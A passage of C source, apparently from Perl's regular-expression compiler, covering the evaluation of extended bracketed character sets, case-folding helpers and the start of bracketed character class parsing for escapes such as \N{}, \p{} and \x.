top_ptr = av_fetch(stack, top_index, FALSE);
assert(top_ptr);
if (IS_OPERATOR(*top_ptr)) {
/* The only permissible operator at the top of the stack is
* '!', which is applied immediately to this operand. */
curchar = (char) SvUV(*top_ptr);
if (curchar != '!') {
SvREFCNT_dec(current);
vFAIL2("Unexpected binary operator '%c' with no "
"preceding operand", curchar);
}
_invlist_invert(current);
only_to_avoid_leaks = av_pop(stack);
SvREFCNT_dec(only_to_avoid_leaks);
/* And we redo with the inverted operand. This allows
* handling multiple ! in a row */
goto handle_operand;
}
/* Single operand is ok only for the non-binary ')'
* operator */
else if ((top_index - fence == 0 && curchar != ')')
|| (top_index - fence > 0
&& (! (stacked_ptr = av_fetch(stack,
top_index - 1,
FALSE))
|| IS_OPERAND(*stacked_ptr))))
{
SvREFCNT_dec(current);
vFAIL("Operand with no preceding operator");
}
}
/* Here there was nothing on the stack or the top element was
* another operand. Just add this new one */
av_push(stack, current);
} /* End of switch on next parse token */
RExC_parse += (UTF) ? UTF8SKIP(RExC_parse) : 1;
} /* End of loop parsing through the construct */
vFAIL("Syntax error in (?[...])");
done:
if (RExC_parse >= RExC_end || RExC_parse[1] != ')') {
if (RExC_parse < RExC_end) {
RExC_parse++;
}
vFAIL("Unexpected ']' with no following ')' in (?[...");
}
if (av_tindex_skip_len_mg(fence_stack) >= 0) {
vFAIL("Unmatched (");
}
if (av_tindex_skip_len_mg(stack) < 0 /* Was empty */
|| ((final = av_pop(stack)) == NULL)
|| ! IS_OPERAND(final)
|| ! is_invlist(final)
|| av_tindex_skip_len_mg(stack) >= 0) /* More left on stack */
{
bad_syntax:
SvREFCNT_dec(final);
vFAIL("Incomplete expression within '(?[ ])'");
}
/* Here, 'final' is the resultant inversion list from evaluating the
* expression. Return it if so requested */
if (return_invlist) {
*return_invlist = final;
return END;
}
/* Otherwise generate a resultant node, based on 'final'. regclass() is
* expecting a string of ranges and individual code points */
invlist_iterinit(final);
result_string = newSVpvs("");
while (invlist_iternext(final, &start, &end)) {
if (start == end) {
Perl_sv_catpvf(aTHX_ result_string, "\\x{%" UVXf "}", start);
}
else {
Perl_sv_catpvf(aTHX_ result_string, "\\x{%" UVXf "}-\\x{%" UVXf "}",
start, end);
}
}
/* About to generate an ANYOF (or similar) node from the inversion list we
* have calculated */
save_parse = RExC_parse;
RExC_parse = SvPV(result_string, len);
save_end = RExC_end;
RExC_end = RExC_parse + len;
TURN_OFF_WARNINGS_IN_SUBSTITUTE_PARSE;
/* We turn off folding around the call, as the class we have constructed
* already has all folding taken into consideration, and we don't want
* regclass() to add to that */
RExC_flags &= ~RXf_PMf_FOLD;
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if multi-char
* folds are allowed. */
node = regclass(pRExC_state, flagp, depth+1,
FALSE, /* means parse the whole char class */
FALSE, /* don't allow multi-char folds */
TRUE, /* silence non-portable warnings. The above may very
well have generated non-portable code points, but
they're valid on this machine */
FALSE, /* similarly, no need for strict */
FALSE, /* Require return to be an ANYOF */
NULL
);
RESTORE_WARNINGS;
RExC_parse = save_parse + 1;
RExC_end = save_end;
SvREFCNT_dec_NN(final);
SvREFCNT_dec_NN(result_string);
if (save_fold) {
RExC_flags |= RXf_PMf_FOLD;
}
if (!node) {
RETURN_FAIL_ON_RESTART(*flagp, flagp);
goto regclass_failed;
}
/* Fix up the node type if we are in locale. (We have pretended we are
* under /u for the purposes of regclass(), as this construct will only
* work under UTF-8 locales. But now we change the opcode to be ANYOFL (so
* as to cause any warnings about bad locales to be output in regexec.c),
* and add the flag that indicates to check if not in a UTF-8 locale. The
* reason we above forbid optimization into something other than an ANYOF
* node is simply to minimize the number of code changes in regexec.c.
* Otherwise we would have to create new EXACTish node types and deal with
* them. This decision could be revisited should this construct become
* popular.
*
* (One might think we could look at the resulting ANYOF node and suppress
* the flag if everything is above 255, as those would be UTF-8 only,
* but this isn't true, as the components that led to that result could
* have been locale-affected, and just happen to cancel each other out
* under UTF-8 locales.) */
if (in_locale) {
set_regex_charset(&RExC_flags, REGEX_LOCALE_CHARSET);
assert(OP(REGNODE_p(node)) == ANYOF);
OP(REGNODE_p(node)) = ANYOFL;
ANYOF_FLAGS(REGNODE_p(node))
|= ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
nextchar(pRExC_state);
Set_Node_Length(REGNODE_p(node), RExC_parse - oregcomp_parse + 1); /* MJD */
return node;
regclass_failed:
FAIL2("panic: regclass returned failure to handle_sets, " "flags=%#" UVxf,
(UV) *flagp);
}
#ifdef ENABLE_REGEX_SETS_DEBUGGING
STATIC void
S_dump_regex_sets_structures(pTHX_ RExC_state_t *pRExC_state,
AV * stack, const IV fence, AV * fence_stack)
{ /* Dumps the stacks in handle_regex_sets() */
const SSize_t stack_top = av_tindex_skip_len_mg(stack);
const SSize_t fence_stack_top = av_tindex_skip_len_mg(fence_stack);
SSize_t i;
PERL_ARGS_ASSERT_DUMP_REGEX_SETS_STRUCTURES;
PerlIO_printf(Perl_debug_log, "\nParse position is:%s\n", RExC_parse);
if (stack_top < 0) {
PerlIO_printf(Perl_debug_log, "Nothing on stack\n");
}
else {
PerlIO_printf(Perl_debug_log, "Stack: (fence=%d)\n", (int) fence);
for (i = stack_top; i >= 0; i--) {
SV ** element_ptr = av_fetch(stack, i, FALSE);
if (! element_ptr) {
}
if (IS_OPERATOR(*element_ptr)) {
PerlIO_printf(Perl_debug_log, "[%d]: %c\n",
(int) i, (int) SvIV(*element_ptr));
}
else {
PerlIO_printf(Perl_debug_log, "[%d] ", (int) i);
sv_dump(*element_ptr);
}
}
}
if (fence_stack_top < 0) {
PerlIO_printf(Perl_debug_log, "Nothing on fence_stack\n");
}
else {
PerlIO_printf(Perl_debug_log, "Fence_stack: \n");
for (i = fence_stack_top; i >= 0; i--) {
SV ** element_ptr = av_fetch(fence_stack, i, FALSE);
if (! element_ptr) {
}
PerlIO_printf(Perl_debug_log, "[%d]: %d\n",
(int) i, (int) SvIV(*element_ptr));
}
}
}
#endif
#undef IS_OPERATOR
#undef IS_OPERAND
STATIC void
S_add_above_Latin1_folds(pTHX_ RExC_state_t *pRExC_state, const U8 cp, SV** invlist)
{
/* This adds the Latin1/above-Latin1 folding rules.
*
* This should be called only for a Latin1-range code points, cp, which is
* known to be involved in a simple fold with other code points above
* Latin1. It would give false results if /aa has been specified.
* Multi-char folds are outside the scope of this, and must be handled
* specially. */
PERL_ARGS_ASSERT_ADD_ABOVE_LATIN1_FOLDS;
assert(HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(cp));
/* The rules that are valid for all Unicode versions are hard-coded in */
switch (cp) {
case 'k':
case 'K':
*invlist =
add_cp_to_invlist(*invlist, KELVIN_SIGN);
break;
case 's':
case 'S':
*invlist = add_cp_to_invlist(*invlist, LATIN_SMALL_LETTER_LONG_S);
break;
case MICRO_SIGN:
*invlist = add_cp_to_invlist(*invlist, GREEK_CAPITAL_LETTER_MU);
*invlist = add_cp_to_invlist(*invlist, GREEK_SMALL_LETTER_MU);
break;
case LATIN_CAPITAL_LETTER_A_WITH_RING_ABOVE:
case LATIN_SMALL_LETTER_A_WITH_RING_ABOVE:
*invlist = add_cp_to_invlist(*invlist, ANGSTROM_SIGN);
break;
case LATIN_SMALL_LETTER_Y_WITH_DIAERESIS:
*invlist = add_cp_to_invlist(*invlist,
LATIN_CAPITAL_LETTER_Y_WITH_DIAERESIS);
break;
default: /* Other code points are checked against the data for the
current Unicode version */
{
Size_t folds_count;
unsigned int first_fold;
const unsigned int * remaining_folds;
UV folded_cp;
if (isASCII(cp)) {
folded_cp = toFOLD(cp);
}
else {
U8 dummy_fold[UTF8_MAXBYTES_CASE+1];
Size_t dummy_len;
folded_cp = _to_fold_latin1(cp, dummy_fold, &dummy_len, 0);
}
if (folded_cp > 255) {
*invlist = add_cp_to_invlist(*invlist, folded_cp);
}
folds_count = _inverse_folds(folded_cp, &first_fold,
&remaining_folds);
if (folds_count == 0) {
/* Use deprecated warning to increase the chances of this being
* output */
ckWARN2reg_d(RExC_parse,
"Perl folding rules are not up-to-date for 0x%02X;"
" please use the perlbug utility to report;", cp);
}
else {
unsigned int i;
if (first_fold > 255) {
*invlist = add_cp_to_invlist(*invlist, first_fold);
}
for (i = 0; i < folds_count - 1; i++) {
if (remaining_folds[i] > 255) {
*invlist = add_cp_to_invlist(*invlist,
remaining_folds[i]);
}
}
}
break;
}
}
}
STATIC void
S_output_posix_warnings(pTHX_ RExC_state_t *pRExC_state, AV* posix_warnings)
{
/* Output the elements of the array given by '*posix_warnings' as REGEXP
* warnings. */
SV * msg;
const bool first_is_fatal = ckDEAD(packWARN(WARN_REGEXP));
PERL_ARGS_ASSERT_OUTPUT_POSIX_WARNINGS;
if (! TO_OUTPUT_WARNINGS(RExC_parse)) {
return;
}
while ((msg = av_shift(posix_warnings)) != &PL_sv_undef) {
if (first_is_fatal) { /* Avoid leaking this */
av_undef(posix_warnings); /* This isn't necessary if the
array is mortal, but is a
fail-safe */
(void) sv_2mortal(msg);
PREPARE_TO_DIE;
}
Perl_warner(aTHX_ packWARN(WARN_REGEXP), "%s", SvPVX(msg));
SvREFCNT_dec_NN(msg);
}
UPDATE_WARNINGS_LOC(RExC_parse);
}
STATIC AV *
S_add_multi_match(pTHX_ AV* multi_char_matches, SV* multi_string, const STRLEN cp_count)
{
/* This adds the string scalar <multi_string> to the array
* <multi_char_matches>. <multi_string> is known to have exactly
* <cp_count> code points in it. This is used when constructing a
* bracketed character class and we find something that needs to match more
* than a single character.
*
* <multi_char_matches> is actually an array of arrays. Each top-level
* element is an array that contains all the strings known so far that are
* the same length. And that length (in number of code points) is the same
* as the index of the top-level array. Hence, the [2] element is an
* array, each element thereof is a string containing TWO code points;
* while element [3] is for strings of THREE characters, and so on. Since
* this is for multi-char strings there can never be a [0] nor [1] element.
*
* When we rewrite the character class below, we will do so such that the
* longest strings are written first, so that it prefers the longest
* matching strings first. This is done even if it turns out that any
* quantifier is non-greedy, out of this programmer's (khw) laziness. Tom
* Christiansen has agreed that this is ok. This makes the test for the
* ligature 'ffi' come before the test for 'ff', for example */
AV* this_array;
AV** this_array_ptr;
PERL_ARGS_ASSERT_ADD_MULTI_MATCH;
if (! multi_char_matches) {
multi_char_matches = newAV();
}
if (av_exists(multi_char_matches, cp_count)) {
this_array_ptr = (AV**) av_fetch(multi_char_matches, cp_count, FALSE);
this_array = *this_array_ptr;
}
else {
this_array = newAV();
av_store(multi_char_matches, cp_count,
(SV*) this_array);
}
av_push(this_array, multi_string);
return multi_char_matches;
}
/* The names of properties whose definitions are not known at compile time are
* stored in this SV, after a constant heading. So if the length has been
* changed since initialization, then there is a run-time definition. */
#define HAS_NONLOCALE_RUNTIME_PROPERTY_DEFINITION \
(SvCUR(listsv) != initial_listsv_len)
/* There is a restricted set of white space characters that are legal when
* ignoring white space in a bracketed character class. This generates the
* code to skip them.
*
* There is a line below that uses the same white space criteria but is outside
* this macro. Both here and there must use the same definition */
#define SKIP_BRACKETED_WHITE_SPACE(do_skip, p) \
STMT_START { \
if (do_skip) { \
while (isBLANK_A(UCHARAT(p))) \
{ \
p++; \
} \
} \
} STMT_END
STATIC regnode_offset
S_regclass(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, U32 depth,
const bool stop_at_1, /* Just parse the next thing, don't
look for a full character class */
bool allow_mutiple_chars,
const bool silence_non_portable, /* Don't output warnings
about too large
characters */
const bool strict,
bool optimizable, /* ? Allow a non-ANYOF return
node */
SV** ret_invlist /* Return an inversion list, not a node */
)
{
/* parse a bracketed class specification. Most of these will produce an
* ANYOF node; but something like [a] will produce an EXACT node; [aA], an
* EXACTFish node; [[:ascii:]], a POSIXA node; etc. It is more complex
* under /i with multi-character folds: it will be rewritten following the
* paradigm of this example, where the <multi-fold>s are characters which
* fold to multiple character sequences:
* /[abc\x{multi-fold1}def\x{multi-fold2}ghi]/i
* gets effectively rewritten as:
* /(?:\x{multi-fold1}|\x{multi-fold2}|[abcdefghi]/i
* reg() gets called (recursively) on the rewritten version, and this
* function will return what it constructs. (Actually the <multi-fold>s
* aren't physically removed from the [abcdefghi], it's just that they are
* ignored in the recursion by means of a flag:
* <RExC_in_multi_char_class>.)
*
* ANYOF nodes contain a bit map for the first NUM_ANYOF_CODE_POINTS
* characters, with the corresponding bit set if that character is in the
* list. For characters above this, an inversion list is used. There
* are extra bits for \w, etc. in locale ANYOFs, as what these match is not
* determinable at compile time
*
* On success, returns the offset at which any next node should be placed
* into the regex engine program being compiled.
*
* Returns 0 otherwise, setting flagp to RESTART_PARSE if the parse needs
* to be restarted, or'd with NEED_UTF8 if the pattern needs to be upgraded to
* UTF-8
*/
dVAR;
UV prevvalue = OOB_UNICODE, save_prevvalue = OOB_UNICODE;
IV range = 0;
UV value = OOB_UNICODE, save_value = OOB_UNICODE;
regnode_offset ret = -1; /* Initialized to an illegal value */
STRLEN numlen;
int namedclass = OOB_NAMEDCLASS;
char *rangebegin = NULL;
SV *listsv = NULL; /* List of \p{user-defined} whose definitions
aren't available at the time this was called */
STRLEN initial_listsv_len = 0; /* Kind of a kludge to see if it is more
than just initialized. */
SV* properties = NULL; /* Code points that match \p{} \P{} */
SV* posixes = NULL; /* Code points that match classes like [:word:],
extended beyond the Latin1 range. These have to
be kept separate from other code points for much
of this function because their handling is
different under /i, and for most classes under
/d as well */
SV* nposixes = NULL; /* Similarly for [:^word:]. These are kept
separate for a while from the non-complemented
versions because of complications with /d
matching */
SV* simple_posixes = NULL; /* But under some conditions, the classes can be
treated more simply than the general case,
leading to less compilation and execution
work */
UV element_count = 0; /* Number of distinct elements in the class.
Optimizations may be possible if this is tiny */
AV * multi_char_matches = NULL; /* Code points that fold to more than one
character; used under /i */
UV n;
char * stop_ptr = RExC_end; /* where to stop parsing */
/* ignore unescaped whitespace? */
const bool skip_white = cBOOL( ret_invlist
|| (RExC_flags & RXf_PMf_EXTENDED_MORE));
/* inversion list of code points this node matches only when the target
* string is in UTF-8. These are all non-ASCII, < 256. (Because is under
* /d) */
SV* upper_latin1_only_utf8_matches = NULL;
/* Inversion list of code points this node matches regardless of things
* like locale, folding, utf8ness of the target string */
SV* cp_list = NULL;
/* Like cp_list, but code points on this list need to be checked for things
* that fold to/from them under /i */
SV* cp_foldable_list = NULL;
/* Like cp_list, but code points on this list are valid only when the
* runtime locale is UTF-8 */
SV* only_utf8_locale_list = NULL;
/* In a range, if one of the endpoints is non-character-set portable,
* meaning that it hard-codes a code point that may mean a different
* charactger in ASCII vs. EBCDIC, as opposed to, say, a literal 'A' or a
* mnemonic '\t' which each mean the same character no matter which
* character set the platform is on. */
unsigned int non_portable_endpoint = 0;
/* Is the range unicode? which means on a platform that isn't 1-1 native
* to Unicode (i.e. non-ASCII), each code point in it should be considered
* to be a Unicode value. */
bool unicode_range = FALSE;
bool invert = FALSE; /* Is this class to be complemented */
bool warn_super = ALWAYS_WARN_SUPER;
const char * orig_parse = RExC_parse;
/* This variable is used to mark where the end in the input is of something
* that looks like a POSIX construct but isn't. During the parse, when
* something looks like it could be such a construct is encountered, it is
* checked for being one, but not if we've already checked this area of the
* input. Only after this position is reached do we check again */
char *not_posix_region_end = RExC_parse - 1;
AV* posix_warnings = NULL;
const bool do_posix_warnings = ckWARN(WARN_REGEXP);
U8 op = END; /* The returned node-type, initialized to an impossible
one. */
U8 anyof_flags = 0; /* flag bits if the node is an ANYOF-type */
U32 posixl = 0; /* bit field of posix classes matched under /l */
/* Flags as to what things aren't knowable until runtime. (Note that these are
* mutually exclusive.) */
#define HAS_USER_DEFINED_PROPERTY 0x01 /* /u any user-defined properties that
haven't been defined as of yet */
#define HAS_D_RUNTIME_DEPENDENCY 0x02 /* /d if the target being matched is
UTF-8 or not */
#define HAS_L_RUNTIME_DEPENDENCY 0x04 /* /l what the posix classes match and
what gets folded */
U32 has_runtime_dependency = 0; /* OR of the above flags */
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGCLASS;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
/* If wants an inversion list returned, we can't optimize to something
* else. */
if (ret_invlist) {
optimizable = FALSE;
}
DEBUG_PARSE("clas");
#if UNICODE_MAJOR_VERSION < 3 /* no multifolds in early Unicode */ \
|| (UNICODE_MAJOR_VERSION == 3 && UNICODE_DOT_VERSION == 0 \
&& UNICODE_DOT_DOT_VERSION == 0)
allow_mutiple_chars = FALSE;
#endif
/* We include the /i status at the beginning of this so that we can
* know it at runtime */
listsv = sv_2mortal(Perl_newSVpvf(aTHX_ "#%d\n", cBOOL(FOLD)));
initial_listsv_len = SvCUR(listsv);
SvTEMP_off(listsv); /* Grr, TEMPs and mortals are conflated. */
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
assert(RExC_parse <= RExC_end);
if (UCHARAT(RExC_parse) == '^') { /* Complement the class */
RExC_parse++;
invert = TRUE;
allow_mutiple_chars = FALSE;
MARK_NAUGHTY(1);
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
}
/* Check that they didn't say [:posix:] instead of [[:posix:]] */
if (! ret_invlist && MAYBE_POSIXCC(UCHARAT(RExC_parse))) {
int maybe_class = handle_possible_posix(pRExC_state,
RExC_parse,
¬_posix_region_end,
NULL,
TRUE /* checking only */);
if (maybe_class >= OOB_NAMEDCLASS && do_posix_warnings) {
ckWARN4reg(not_posix_region_end,
"POSIX syntax [%c %c] belongs inside character classes%s",
*RExC_parse, *RExC_parse,
(maybe_class == OOB_NAMEDCLASS)
? ((POSIXCC_NOTYET(*RExC_parse))
? " (but this one isn't implemented)"
: " (but this one isn't fully valid)")
: ""
);
}
}
/* If the caller wants us to just parse a single element, accomplish this
* by faking the loop ending condition */
if (stop_at_1 && RExC_end > RExC_parse) {
stop_ptr = RExC_parse + 1;
}
/* allow 1st char to be ']' (allowing it to be '-' is dealt with later) */
if (UCHARAT(RExC_parse) == ']')
goto charclassloop;
while (1) {
if ( posix_warnings
&& av_tindex_skip_len_mg(posix_warnings) >= 0
&& RExC_parse > not_posix_region_end)
{
/* Warnings about posix class issues are considered tentative until
* we are far enough along in the parse that we can no longer
* change our mind, at which point we output them. This is done
* each time through the loop so that a later class won't zap them
* before they have been dealt with. */
output_posix_warnings(pRExC_state, posix_warnings);
}
if (RExC_parse >= stop_ptr) {
break;
}
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
if (UCHARAT(RExC_parse) == ']') {
break;
}
charclassloop:
namedclass = OOB_NAMEDCLASS; /* initialize as illegal */
save_value = value;
save_prevvalue = prevvalue;
if (!range) {
rangebegin = RExC_parse;
element_count++;
non_portable_endpoint = 0;
}
if (UTF && ! UTF8_IS_INVARIANT(* RExC_parse)) {
value = utf8n_to_uvchr((U8*)RExC_parse,
RExC_end - RExC_parse,
&numlen, UTF8_ALLOW_DEFAULT);
RExC_parse += numlen;
}
else
value = UCHARAT(RExC_parse++);
if (value == '[') {
char * posix_class_end;
namedclass = handle_possible_posix(pRExC_state,
RExC_parse,
&posix_class_end,
do_posix_warnings ? &posix_warnings : NULL,
FALSE /* die if error */);
if (namedclass > OOB_NAMEDCLASS) {
/* If there was an earlier attempt to parse this particular
* posix class, and it failed, it was a false alarm, as this
* successful one proves */
if ( posix_warnings
&& av_tindex_skip_len_mg(posix_warnings) >= 0
&& not_posix_region_end >= RExC_parse
&& not_posix_region_end <= posix_class_end)
{
av_undef(posix_warnings);
}
RExC_parse = posix_class_end;
}
else if (namedclass == OOB_NAMEDCLASS) {
not_posix_region_end = posix_class_end;
}
else {
namedclass = OOB_NAMEDCLASS;
}
}
else if ( RExC_parse - 1 > not_posix_region_end
&& MAYBE_POSIXCC(value))
{
(void) handle_possible_posix(
pRExC_state,
RExC_parse - 1, /* -1 because parse has already been
advanced */
¬_posix_region_end,
do_posix_warnings ? &posix_warnings : NULL,
TRUE /* checking only */);
}
else if ( strict && ! skip_white
&& ( _generic_isCC(value, _CC_VERTSPACE)
|| is_VERTWS_cp_high(value)))
{
vFAIL("Literal vertical space in [] is illegal except under /x");
}
else if (value == '\\') {
/* Is a backslash; get the code point of the char after it */
if (RExC_parse >= RExC_end) {
vFAIL("Unmatched [");
}
if (UTF && ! UTF8_IS_INVARIANT(UCHARAT(RExC_parse))) {
value = utf8n_to_uvchr((U8*)RExC_parse,
RExC_end - RExC_parse,
&numlen, UTF8_ALLOW_DEFAULT);
RExC_parse += numlen;
}
else
value = UCHARAT(RExC_parse++);
/* Some compilers cannot handle switching on 64-bit integer
* values, therefore value cannot be an UV. Yes, this will
* be a problem later if we want switch on Unicode.
* A similar issue a little bit later when switching on
* namedclass. --jhi */
/* If the \ is escaping white space when white space is being
* skipped, it means that that white space is wanted literally, and
* is already in 'value'. Otherwise, need to translate the escape
* into what it signifies. */
if (! skip_white || ! isBLANK_A(value)) switch ((I32)value) {
case 'w': namedclass = ANYOF_WORDCHAR; break;
case 'W': namedclass = ANYOF_NWORDCHAR; break;
case 's': namedclass = ANYOF_SPACE; break;
case 'S': namedclass = ANYOF_NSPACE; break;
case 'd': namedclass = ANYOF_DIGIT; break;
case 'D': namedclass = ANYOF_NDIGIT; break;
case 'v': namedclass = ANYOF_VERTWS; break;
case 'V': namedclass = ANYOF_NVERTWS; break;
case 'h': namedclass = ANYOF_HORIZWS; break;
case 'H': namedclass = ANYOF_NHORIZWS; break;
case 'N': /* Handle \N{NAME} in class */
{
const char * const backslash_N_beg = RExC_parse - 2;
int cp_count;
if (! grok_bslash_N(pRExC_state,
NULL, /* No regnode */
&value, /* Yes single value */
&cp_count, /* Multiple code pt count */
flagp,
strict,
depth)
) {
if (*flagp & NEED_UTF8)
FAIL("panic: grok_bslash_N set NEED_UTF8");
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
if (cp_count < 0) {
vFAIL("\\N in a character class must be a named character: \\N{...}");
}
else if (cp_count == 0) {
ckWARNreg(RExC_parse,
"Ignoring zero length \\N{} in character class");
}
else { /* cp_count > 1 */
assert(cp_count > 1);
if (! RExC_in_multi_char_class) {
if ( ! allow_mutiple_chars
|| invert
|| range
|| *RExC_parse == '-')
{
if (strict) {
RExC_parse--;
vFAIL("\\N{} in inverted character class or as a range end-point is restricted to one character");
}
ckWARNreg(RExC_parse, "Using just the first character returned by \\N{} in character class");
break; /* <value> contains the first code
point. Drop out of the switch to
process it */
}
else {
SV * multi_char_N = newSVpvn(backslash_N_beg,
RExC_parse - backslash_N_beg);
multi_char_matches
= add_multi_match(multi_char_matches,
multi_char_N,
cp_count);
}
}
} /* End of cp_count != 1 */
/* This element should not be processed further in this
* class */
element_count--;
value = save_value;
prevvalue = save_prevvalue;
continue; /* Back to top of loop to get next char */
}
/* Here, is a single code point, and <value> contains it */
unicode_range = TRUE; /* \N{} are Unicode */
}
break;
case 'p':
case 'P':
{
char *e;
/* \p means they want Unicode semantics */
REQUIRE_UNI_RULES(flagp, 0);
if (RExC_parse >= RExC_end)
vFAIL2("Empty \\%c", (U8)value);
if (*RExC_parse == '{') {
const U8 c = (U8)value;
e = (char *) memchr(RExC_parse, '}', RExC_end - RExC_parse);
if (!e) {
RExC_parse++;
vFAIL2("Missing right brace on \\%c{}", c);
}
RExC_parse++;
/* White space is allowed adjacent to the braces and after
* any '^', even when not under /x */
while (isSPACE(*RExC_parse)) {
RExC_parse++;
}
if (UCHARAT(RExC_parse) == '^') {
/* toggle. (The rhs xor gets the single bit that
* differs between P and p; the other xor inverts just
* that bit) */
value ^= 'P' ^ 'p';
RExC_parse++;
while (isSPACE(*RExC_parse)) {
RExC_parse++;
}
}
if (e == RExC_parse)
vFAIL2("Empty \\%c{}", c);
n = e - RExC_parse;
while (isSPACE(*(RExC_parse + n - 1)))
n--;
} /* The \p isn't immediately followed by a '{' */
else if (! isALPHA(*RExC_parse)) {
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL2("Character following \\%c must be '{' or a "
"single-character Unicode property name",
(U8) value);
}
else {
e = RExC_parse;
n = 1;
}
{
char* name = RExC_parse;
/* Any message returned about expanding the definition */
SV* msg = newSVpvs_flags("", SVs_TEMP);
/* If set TRUE, the property is user-defined as opposed to
* official Unicode */
bool user_defined = FALSE;
SV * prop_definition = parse_uniprop_string(
name, n, UTF, FOLD,
FALSE, /* This is compile-time */
/* We can't defer this defn when
* the full result is required in
* this call */
! cBOOL(ret_invlist),
&user_defined,
msg,
0 /* Base level */
);
if (SvCUR(msg)) { /* Assumes any error causes a msg */
assert(prop_definition == NULL);
RExC_parse = e + 1;
if (SvUTF8(msg)) { /* msg being UTF-8 makes the whole
thing so, or else the display is
mojibake */
RExC_utf8 = TRUE;
}
/* diag_listed_as: Can't find Unicode property definition "%s" in regex; marked by <-- HERE in m/%s/ */
vFAIL2utf8f("%" UTF8f, UTF8fARG(SvUTF8(msg),
SvCUR(msg), SvPVX(msg)));
}
if (! is_invlist(prop_definition)) {
/* Here, the definition isn't known, so we have gotten
* returned a string that will be evaluated if and when
* encountered at runtime. We add it to the list of
* such properties, along with whether it should be
* complemented or not */
if (value == 'P') {
sv_catpvs(listsv, "!");
}
else {
sv_catpvs(listsv, "+");
}
sv_catsv(listsv, prop_definition);
has_runtime_dependency |= HAS_USER_DEFINED_PROPERTY;
/* We don't know yet what this matches, so have to flag
* it */
anyof_flags |= ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP;
}
else {
assert (prop_definition && is_invlist(prop_definition));
/* Here we do have the complete property definition
*
* Temporary workaround for [perl #133136]. For this
* precise input that is in the .t that is failing,
* load utf8.pm, which is what the test wants, so that
* that .t passes */
if ( memEQs(RExC_start, e + 1 - RExC_start,
"foo\\p{Alnum}")
&& ! hv_common(GvHVn(PL_incgv),
NULL,
"utf8.pm", sizeof("utf8.pm") - 1,
0, HV_FETCH_ISEXISTS, NULL, 0))
{
require_pv("utf8.pm");
}
if (! user_defined &&
/* We warn on matching an above-Unicode code point
* if the match would return true, except don't
* warn for \p{All}, which has exactly one element
* = 0 */
(_invlist_contains_cp(prop_definition, 0x110000)
&& (! (_invlist_len(prop_definition) == 1
&& *invlist_array(prop_definition) == 0))))
{
warn_super = TRUE;
}
/* Invert if asking for the complement */
if (value == 'P') {
_invlist_union_complement_2nd(properties,
prop_definition,
&properties);
}
else {
_invlist_union(properties, prop_definition, &properties);
}
}
}
RExC_parse = e + 1;
namedclass = ANYOF_UNIPROP; /* no official name, but it's
named */
}
break;
case 'n': value = '\n'; break;
case 'r': value = '\r'; break;
case 't': value = '\t'; break;
case 'f': value = '\f'; break;
case 'b': value = '\b'; break;
case 'e': value = ESC_NATIVE; break;
case 'a': value = '\a'; break;
case 'o':
RExC_parse--; /* function expects to be pointed at the 'o' */
{
const char* error_msg;
bool valid = grok_bslash_o(&RExC_parse,
RExC_end,
&value,
&error_msg,
TO_OUTPUT_WARNINGS(RExC_parse),
strict,
silence_non_portable,
UTF);
if (! valid) {
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(RExC_parse - 1);
}
non_portable_endpoint++;
break;
case 'x':
RExC_parse--; /* function expects to be pointed at the 'x' */
{
const char* error_msg;
bool valid = grok_bslash_x(&RExC_parse,
RExC_end,
&value,
&error_msg,
TO_OUTPUT_WARNINGS(RExC_parse),
strict,
silence_non_portable,
UTF);
if (! valid) {
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(RExC_parse - 1);
}
non_portable_endpoint++;
break;
case 'c':
value = grok_bslash_c(*RExC_parse, TO_OUTPUT_WARNINGS(RExC_parse));
UPDATE_WARNINGS_LOC(RExC_parse);
RExC_parse++;
non_portable_endpoint++;
break;
case '0': case '1': case '2': case '3': case '4':
case '5': case '6': case '7':
{
/* Take 1-3 octal digits */
I32 flags = PERL_SCAN_SILENT_ILLDIGIT;
numlen = (strict) ? 4 : 3;
value = grok_oct(--RExC_parse, &numlen, &flags, NULL);
RExC_parse += numlen;
if (numlen != 3) {
if (strict) {
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL("Need exactly 3 octal digits");
}
else if ( numlen < 3 /* like \08, \178 */
&& RExC_parse < RExC_end
&& isDIGIT(*RExC_parse)
&& ckWARN(WARN_REGEXP))
{
reg_warn_non_literal_string(
RExC_parse + 1,
form_short_octal_warning(RExC_parse, numlen));
}
}
non_portable_endpoint++;
break;
}
default:
/* Allow \_ to not give an error */
if (isWORDCHAR(value) && value != '_') {
if (strict) {
vFAIL2("Unrecognized escape \\%c in character class",
(int)value);
}
else {
ckWARN2reg(RExC_parse,
"Unrecognized escape \\%c in character class passed through",
(int)value);
}
}
break;
} /* End of switch on char following backslash */
} /* end of handling backslash escape sequences */
/* Here, we have the current token in 'value' */
if (namedclass > OOB_NAMEDCLASS) { /* this is a named class \blah */
U8 classnum;
/* a bad range like a-\d, a-[:digit:]. The '-' is taken as a
* literal, as is the character that began the false range, i.e.
* the 'a' in the examples */
if (range) {
const int w = (RExC_parse >= rangebegin)
? RExC_parse - rangebegin
: 0;
if (strict) {
vFAIL2utf8f(
"False [] range \"%" UTF8f "\"",
UTF8fARG(UTF, w, rangebegin));
}
else {
ckWARN2reg(RExC_parse,
"False [] range \"%" UTF8f "\"",
UTF8fARG(UTF, w, rangebegin));
cp_list = add_cp_to_invlist(cp_list, '-');
cp_foldable_list = add_cp_to_invlist(cp_foldable_list,
prevvalue);
}
range = 0; /* this was not a true range */
element_count += 2; /* So counts for three values */
}
classnum = namedclass_to_classnum(namedclass);
if (LOC && namedclass < ANYOF_POSIXL_MAX
#ifndef HAS_ISASCII
&& classnum != _CC_ASCII
#endif
) {
SV* scratch_list = NULL;
/* What the Posix classes (like \w, [:space:]) match isn't
